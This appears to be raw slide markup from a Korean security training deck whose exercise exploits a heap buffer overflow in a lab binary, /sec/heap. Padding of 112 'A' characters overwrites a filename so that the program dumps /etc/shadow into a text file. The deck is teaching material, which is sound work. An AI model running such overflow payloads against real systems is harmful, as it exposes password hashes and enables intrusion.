          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4159537457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="3174175"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="195635228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15156180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2686685">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실행시마다 주소가 변경되어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2149480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA94637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7" t="325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="17611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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE82A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282989" y="4521813"/>
            <a:ext cx="4503420" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21905217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7EC4553F-CF47-4982-BAED-66DAB834C2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2829087457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="2930335"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8629174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95016968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="25204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스택 내에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자체의 실행이 불가능하게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8416208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96F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60" y="1311503"/>
            <a:ext cx="4770438" cy="2006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E17C4A-3B31-4DDC-AF8F-C53104642EDB}"/>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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10514605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출력하시오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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1597882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723425905"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3933092" y="2813240"/>
          <a:ext cx="3807061" cy="985393"/>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Inforsec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Defcybsec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국방 사이버 보안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Circles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문화부</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>정보보호반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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25783825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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</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/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cat goodfile</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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC47731D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="1308062"/>
            <a:ext cx="3931920" cy="678180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B21602F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="2572320"/>
            <a:ext cx="4954143" cy="2751582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="2315" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="501060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA3441663962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="927" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="1262591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922514E9-35C9-4437-B2C6-2C1F069FC0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1730220895"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="58839612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80712301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2192020">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114587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB72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8727" y="3007517"/>
            <a:ext cx="4783138" cy="1881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02064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err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*112+"B"') &gt; 1.txt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위의 실행 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을 확인</a:t>
            </a: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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력되도록 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>112+"/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="699" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="2705101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19AB127-0D1E-49DE-AA80-E2C09252F5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264585511"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="2784276"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="255215">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49791167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252906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시작 주소로부터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개의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문자가 복사되며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시작 주소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복사된다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5568446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264F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97" y="4473906"/>
            <a:ext cx="4593352" cy="1806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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7AD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="830" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="4905375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BBB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="2811778"/>
            <a:ext cx="4934204" cy="2746629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204476255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위의 공격 결과 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7321A60-9A8B-4DCF-B6BE-E0B5E85C5327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693238139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="341763896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73645710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="22031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509503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A5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10" y="1092518"/>
            <a:ext cx="4811713" cy="1892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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4DFDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513016" y="3608229"/>
            <a:ext cx="4992116" cy="2759202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C682B9-F1E2-456F-BB10-FF556080591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파일명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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35044337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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B10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/sec/heap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없는 파일의 내용이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ACA32BEB-9045-401B-B976-A8DE580FE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4C69DC5-6D46-4110-B092-F87162F11C2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E250E706-7320-4890-B2A5-9F511E31CF36}"/>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6F75AFA-6CA9-432C-B149-D4CF8BED7C7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2F042198-8D3B-42BA-9AB0-F321EFE2DD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527DCE4-1233-4F8B-B02D-73786CA1D8E6}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85441750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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
